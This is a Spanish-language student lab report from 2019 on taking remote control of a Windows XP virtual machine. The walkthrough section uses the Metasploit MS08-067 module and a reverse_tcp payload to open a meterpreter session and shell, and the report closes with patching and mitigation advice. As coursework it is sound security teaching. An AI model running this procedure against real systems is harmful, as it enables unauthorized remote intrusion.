You are on page 1of 16

INSTITUTO TECNOLÓGICO SUPERIOR

VIDA NUEVA

TECNOLOGÍA EN INFORMÁTICA

MODALIDAD: PRESENCIAL
JORNADA: MATUTINA

ASIGNATURA: SEGURIDAD INFORMÁTICA

CÓDIGO: 1819899

NIVEL: TERCER NIVEL

TEMA: COMPROBACIÓN EXPLOIT WINDOWS XP USING KA LINUX AND PORT


SCANNER IN MSF

AUTOR/ES:

MERA ALEJANDRA

SUAREZ BRYAN

DOCENTE: ING. DARWIN ARIAS M

FECHA: MARZO 2019

QUITO – ECUADOR
ÍNDICE

1. INTRODUCCIÓN .............................................................................................................. 4
2. OBJETIVOS ....................................................................................................................... 5
2.1 Objetivo General ........................................................................................................................... 5
2.2 Objetivos específicos ..................................................................................................................... 5
3. MARCO TEÓRICO............................................................................................................ 6
Linux ................................................................................................................................................... 6
Exploit ................................................................................................................................................. 6
4. DESARROLLO .................................................................................................................. 7
5. CONCLUSIONES ............................................................................................................ 12
6. REFERENCIAS ................................................................................................................ 12
7. BIBLIOGRAFÍA .............................................................................................................. 13
8. ANEXOS .......................................................................................................................... 14

Tabla de imágenes

fotografía 1 Comandos en Linux ................................................................................................ 7


fotografía 2 Comandos en Linux ................................................................................................ 8
fotografía 3 Comandos en Linux ................................................................................................ 8
fotografía 4 Comandos en Linux ................................................................................................ 8
fotografía 5 Comandos en Linux ................................................................................................ 9
fotografía 6 Comandos en Linux .............................................................................................. 10
fotografía 7 Comandos en Linux .............................................................................................. 10
fotografía 8 Comandos en Linux .............................................................................................. 11
fotografía 9 Comandos en Linux .............................................................................................. 11
fotografía 10 pantalla principal de Linux ................................................................................. 14
fotografía 11 Venta Windows XP ............................................................................................ 14
fotografía 12 ifconfig de Linux ................................................................................................ 15
fotografía 13 ipconfig de Windows .......................................................................................... 15
fotografía 14. ingreso ping en máquina virtual Linux .............................................................. 16
fotografía 15 código msfconsole .............................................................................................. 16
fotografía 16. Matasploit pro .................................................................................................... 17
fotografía 17. Conexión entre Linux y Windows XP............................................................... 17

3
1. INTRODUCCIÓN

Kali Linux una herramienta real (o conjunto de herramientas) para profesionales de la


seguridad.

Kali es una distribución de Linux basada en Debian. Su objetivo es simple; incluya tantas
herramientas de penetración y auditoría de seguridad como sea posible en un paquete
conveniente. Kali entrega también muchas de las mejores herramientas de código abierto para
realizar pruebas de seguridad que se recopilan y están listas para usar.

Kali es desarrollado y mantenido por Offensive Security. Son una presencia conocida y
confiable en el mundo de la seguridad, e incluso certifican a los profesionales de la seguridad
con algunas de las certificaciones más respetadas disponibles.

Es una solución conveniente, también. Kali no requiere que mantengas una instalación de
Linux ni recopile su propio software y dependencias. Es llave en mano. Todo el trabajo está
fuera del camino, por lo que puedes concentrarte en el trabajo real de auditar el sistema que
hayas establecido para probar.

Las definiciones habituales que hablan de exploits hablan de un programa o código que
se aprovecha de un agujero de seguridad (vulnerabilidad) en una aplicación o sistema, de
forma que un atacante podría usarla en su beneficio.

Trasladado a la vida real, sería como si un modelo de cerradura (sistema o aplicación)


tuviera un fallo de diseño que nos permitiera crear llaves que la abrieran (exploit) y poder así
acceder al sitio que trata de proteger y realizar actos delictivos (malware).

Existe confusión entre los usuarios y cierto mito de que un exploit puede
considerarse malware. La realidad es que, tal y como hemos visto en el ejemplo, no es un
código malicioso en sí mismo, sino que es la llave para que estos accedan a nuestro sistema.

El escaneo de vulnerabilidades le permitirá escanear rápidamente un rango de IP de


destino en busca de vulnerabilidades conocidas, lo que le dará al probador de penetración una
idea rápida de qué ataques vale la pena realizar.

Cuando se usa correctamente, este es un gran activo para un examinador de bolígrafos,


pero no está exento de inconvenientes. La exploración de vulnerabilidades es bien conocida
por su alta tasa de falsos positivos y falsos negativos. Esto debe tenerse en cuenta al trabajar
con cualquier software de exploración de vulnerabilidades.

4
2. OBJETIVOS

2.1 Objetivo General


Realizar la respectiva comprobación de los exploit en Windows xp utilizando puertos de
escáner con el sistema operativo Kali Linux, garantizando el funcionamiento correcto y
seguro de nuestro sistema operativo, estableciendo responsabilidades y procedimientos
respectivos para la correcta comprobación de los exploit.

2.2 Objetivos específicos


 Conocer en que consiste el exploit y sus estrategias de aplicabilidad, incluyendo
que actividades técnicas se deben tener en cuenta para realizar su debida
comprobación.
 Analizar en que reside el concepto de exploit en profundidad, su estructura y
descripción del proceso de aplicación en lo que puede ser un método de comprobación
frente a un ataque informático.
 Identificar herramientas que permiten explorar los puertos de escaner, que proceso se
ejecuta en el sistema a través de éstos y cuales podrían ser un punto de entrada para un
usuario malicioso.

5
3. MARCO TEÓRICO

Linux
GNU/Linux, también conocido como Linux, es un sistema operativo libre tipo Unix;
multiplataforma, multiusuario y multitarea. El sistema es la combinación de varios proyectos,
entre los cuales destacan GNU (encabezado por Richard Stallman y la Free Software
Foundation) y el núcleo Linux (encabezado por Linus Torvalds). Su desarrollo es uno de los
ejemplos más prominentes de software libre: todo su código fuente puede ser utilizado,
modificado y redistribuido libremente por cualquiera, bajo los términos de la GPL (Licencia
Pública General de GNU) y otra serie de licencias libres.

A GNU/Linux se le encuentra normalmente en forma de compendios conocidos como


distribuciones o distros, a las cuales se les han adicionado selecciones de aplicaciones y
programas para descargar e instalar las mismas. El propósito de una distribución es ofrecer
GNU/Linux como un producto final que el usuario pueda instalar, cumpliendo con las
necesidades de un grupo de usuarios o bien del público general.

Algunas de ellas son especialmente conocidas por su uso en servidores de Internet,


supercomputadoras, y sistemas embebidos; donde GNU/Linux tiene la cuota más importante
del mercado. Según un informe de IDC, GNU/Linux es utilizado por el 78% de los
principales 500 servidores del mundo. Top500.org informa, en su lista de noviembre de 2017,
que todas las 500 supercomputadoras más potentes del mundo utilizan Linux. Con menor
participación, el sistema GNU/Linux también se usa en el segmento de las computadoras de
escritorio, portátiles, computadoras de bolsillo, teléfonos móviles, videoconsolas y otros
dispositivos.

Exploit
Un 'exploit' es un programa o técnica que aprovecha una vulnerabilidad. Los exploits
dependen de los sistemas operativos y sus configuraciones, de las configuraciones de los
programas que se están ejecutando en un ordenador y de la LAN donde están. Pero, ¿qué es
una vulnerabilidad? Una 'vulnerabilidad' es "algo" de un sistema informático que evitará que
se pueda usar correctamente, o que permitirá que lo controlen personas no autorizadas. Hay
muchos tipos de vulnerabilidades. Puede haber un error en la configuración del servicio o bien
un error en la programación del servicio (leáse overflow :P). Pueden estar creados en
cualquier lenguaje. Los exploit para Windows suelen estar hechos en C y/o ensamblador,
mientras que los de Unix pueden estar hechos también en Perl, por ejemplo. Aunque suelen
estar hechos en C.

6
4. DESARROLLO
Tomar control remoto de una máquina Windows XP

En este proyecto mostraremos como aprovechar la vulnerabilidad MS08-067 del módulo


netapi utilizado en el protocolo SMB de equipos Windows que permite la ejecución de código
arbitrario. Para esto usaremos dos máquinas, una con Metasploit (puede ser Windows o
Linux) y una máquina XP (también puede ser una Windows 2003).

Para comenzar abrimos la consola de Metasploit con el comando:

# msfconsole

Ahora seleccionamos el exploit para nuestra vulnerabilidad con el siguiente comando:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

Ya que tenemos en el prompt el nombre de la vulnerabilidad ejecutamos el siguiente comando


para ver cómo debemos configurarlo:

msf exploit(ms08_067_netapi) > show options

fotografía 1 Comandos en Linux

La primera opción RHOST debe contener el nombre o dirección IP de la máquina XP que


queremos atacar. RPORT y SMBPIPE son opciones obligatorias que indican el puerto por el
que se mandará el exploit y el tipo de conexión a utilizar. No es necesario modificar estos
últimos dos valores.

Para configurar la IP de la máquina XP que vamos a atacar, ejecutamos el siguiente comando:

7
fotografía 2 Comandos en Linux

Donde 192.168.75.90 corresponde a la IP de la víctima

La sección “Exploit target” indica a qué plataformas se mandará este exploit. Si ejecutamos el
siguiente comando podemos ver todas las plataformas que son vulnerables con este exploit:

fotografía 3 Comandos en Linux

Observamos que la opción actual “0” indica una identificación automática de la plataforma,
esta opción es suficiente y no es necesario modificarla. Si se desea cambiar podemos hacerlo
con el siguiente comando:

fotografía 4 Comandos en Linux

8
Por último, debemos configurar el payload de nuestro exploit, esto no es más que indicarle a
Mestasploit que una vez que la vulnerabilidad sea explotada en el equipo víctima, debe
ejecutar cierta aplicación para que podamos tomar control remoto de la máquina. Esta
configuración la agregamos con la siguiente opción:

fotografía 5 Comandos en Linux

El payload “reverse_tcp” ejecuta un cliente reverso en la máquina XP, dicho cliente se


conectará hacia nuestro Metasploit por el puerto por defecto 4444. Este payload es el que
finalmente nos permitirá tomar control del equipo víctima. Ahora para indicarle a este cliente
que se conecte a nuestro Metasploit, debemos ejecutar el siguiente comando:

msf exploit(ms08_067_netapi) > set LHOST 192.168.75.35

LHOST => 192.168.75.35

Donde 192.168.75.35 corresponde a la IP de la máquina donde estamos ejecutando el


Metasploit

Con esta configuración estamos listos para iniciar el ataque a la víctima XP. Si ejecutamos
una última vez el comando “show options” veremos cómo quedó la configuración de nuestro
exploit:

9
fotografía 6 Comandos en Linux

Ahora estamos listos para enviar el ataque, para esto sólo ejecutamos el comando “exploit” y
esperamos a que se concrete la operación:

fotografía 7 Comandos en Linux

El último prompt “meterpreter>” nos indica que estamos listos para controlar la máquina XP,
para comprobar que ya nos encontramos dentro de la máquina XP, ejecutamos el comando
“sysinfo”:

10
fotografía 8 Comandos en Linux

Ahora bien, podemos ejecutar el comando “shell” para tener un prompt dentro del equipo
víctima y comenzar a ejecutar operaciones:

fotografía 9 Comandos en Linux

11
5. CONCLUSIONES

 Podemos concluir que un exploit es un programa el cual aprovecha la vulnerabilidad


de otras máquinas a través de la IP, permitiéndonos controlar desde otro ordenador y
manipularla a nuestro gusto.
 También podemos decir que un exploit no es en sí un malware, sino que esta es una
llave que nos permitirá acceder a nuestro sistema desde otro punto operativo.
 Concluimos también que una de las mejores herramientas para evitar los exploit es
mantener nuestro ordenador y todas sus aplicaciones de sistema siempre actualizado,
así de esta manera el usuario puede estar al tanto de distintas amenazas del cual puede
estar siendo participe.

6. REFERENCIAS

 Una de las mejores recomendaciones es mantener todas nuestras aplicaciones y


sistemas actualizados, sabiendo que los exploits se aprovechan de los agujeros
(vulnerabilidad) de seguridad, es necesario cerrarlos cuanto antes, para evitar
cualquier clase de ataque.
 Reducir las entradas de posibles exploits usados en nuestra contra, cuando aún no se
tiene un sistema que proteja nuestro ordenador, en este caso, se pueden utilizar
herramientas como el Kit de herramientas de Experiencia de Mitigación mejorada
(EMET) para Windows. Esto ayudará a evitar que el sistema se infecte hasta que
aparezca una solución definitiva.
 Contar con una solución de seguridad avanzada como ESET Smart Security, capaz de
detectar y bloquear exploits pensados para aprovechar vulnerabilidades en
navegadores web y lectores PDF, entre otros.

12
7. BIBLIOGRAFÍA

Albors, J. (09 de octubre de 2014). Welivesecurity.com by ESET. Obtenido de


Welivesecurity.com by ESET: https://www.welivesecurity.com/la-
es/2014/10/09/exploits-que-son-como-funcionan/

ELHACKER.NET. (s.f.). exploits. Obtenido de exploits:


https://www.elhacker.net/exploits.html

RedinSkala. (08 de abril de 2013). Tomar control remoto de una máquina Windows XP / 2003
con Metasploit. Obtenido de Tomar control remoto de una máquina Windows XP /
2003 con Metasploit: https://www.redinskala.com/2013/04/08/tomar-control-remoto-
de-una-maquina-windows-xp-2003-con-metasploit/

wikipedia. (15 de marzo de 2019). GNU/Linux. Obtenido de GNU/Linux:


https://www.linux.org/

13
8. ANEXOS

fotografía 10 pantalla principal de Linux

fotografía 11 Venta Windows XP

14
fotografía 12 ifconfig de Linux

fotografía 13 ipconfig de Windows

15
fotografía 14. ingreso ping en máquina virtual Linux

fotografía 15 código msfconsole

16
fotografía 16. Matasploit pro

fotografía 17. Conexión entre Linux y Windows XP

17